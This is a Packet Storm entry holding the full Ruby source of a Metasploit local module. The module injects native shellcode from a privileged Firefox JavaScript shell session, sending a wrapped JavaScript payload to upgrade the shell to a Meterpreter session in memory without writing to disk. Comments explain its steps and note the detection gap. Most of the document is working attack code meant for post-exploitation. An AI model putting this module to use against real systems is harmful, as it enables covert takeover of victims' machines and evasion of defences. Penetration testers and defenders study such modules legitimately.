Firefox Exec Shellcode From Privileged Javascript Shell

2014-03-13T00:00:00
ID PACKETSTORM:125704
Type packetstorm
Reporter joev
Modified 2014-03-13T00:00:00

Description

                                        
                                            `##  
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
require 'msf/core/payload/firefox'  
  
# Local Metasploit module that operates on an existing privileged Firefox
# JavaScript shell session (referenced below as +session+).
#
# What this class does itself is limited to what is visible here: it wraps a
# generated JavaScript snippet in [JAVASCRIPT]...[/JAVASCRIPT] markers, writes
# it to the session, and prints whatever is read back before the
# [!JAVASCRIPT] token. The payload-staging JavaScript comes from +run_payload+,
# which is not defined in this file (presumably supplied by one of the
# included mixins -- confirm against the framework source).
#
# Defensive note: according to the module description the payload is placed in
# memory and called without being written to disk, so on-disk scanning has no
# artifact to inspect. Coverage for this technique has to come from memory and
# behavioural telemetry instead.
class Metasploit3 < Msf::Exploit::Local

  include Msf::Payload::Firefox
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation

  # Registers the module metadata and the single TIMEOUT option.
  #
  # info - Hash of metadata overrides merged through update_info.
  #
  # The multi-line description literal is kept flush-left exactly as it
  # appears on the page, because whitespace inside it is part of the string.
  def initialize(info = {})
    merged_info = update_info(info,
      'Name' => 'Firefox Exec Shellcode from Privileged Javascript Shell',
      'Description' => %q{  
Allows execution of native payloads from a privileged Firefox Javascript shell.  
Puts the specified payload into memory, adds the necessary protection flags,  
and calls it. Useful for upgrading a Firefox javascript shell to a Meterpreter  
session without touching the disk.  
},
      'License' => MSF_LICENSE,
      'Author' => ['joev'],
      'Platform' => ['firefox'],
      'DisclosureDate' => 'Mar 10 2014',
      'Targets' => [
        ['Native Payload', { 'Platform' => %w[linux osx win unix], 'Arch' => ARCH_ALL }]
      ],
      'DefaultTarget' => 0
    )
    super(merged_info)

    # Required integer option, default 90: upper bound in seconds on the wait
    # for the session's reply in #exploit.
    timeout_option = OptInt.new('TIMEOUT', [true, 'Maximum time (seconds) to wait for a response', 90])
    register_options([timeout_option], self.class)
  end

  # Sends the wrapped JavaScript to the session and reports the reply.
  #
  # Anything read back before the [!JAVASCRIPT] token is printed with
  # print_warning; nothing is printed when the reply is blank.
  # NOTE(review): the reply presumably includes the "Payload executed."
  # acknowledgement as well as caught exceptions, so a warning-level line
  # does not by itself indicate failure -- confirm against the session code.
  def exploit
    wrapped_script = "[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]"
    session.shell_write(wrapped_script)

    reply = session.shell_read_until_token('[!JAVASCRIPT]', 0, datastore['TIMEOUT'])
    return unless reply.present?

    print_warning(reply)
  end

  # Builds the JavaScript handed to the session.
  #
  # The snippet is an immediately-invoked function taking +send+: it runs the
  # interpolated +run_payload+ code inside try/catch, sends "Payload executed."
  # afterwards, and sends the exception if one is thrown. Surrounding
  # whitespace is stripped from the result.
  #
  # The literal is kept flush-left exactly as on the page: its bytes are what
  # gets written to the session.
  def js_payload
    script = %Q|  
(function(send){  
try {  
#{run_payload}  
send("Payload executed.");  
} catch (e) {  
send(e);  
}  
})(send);  
|
    script.strip
  end
end
`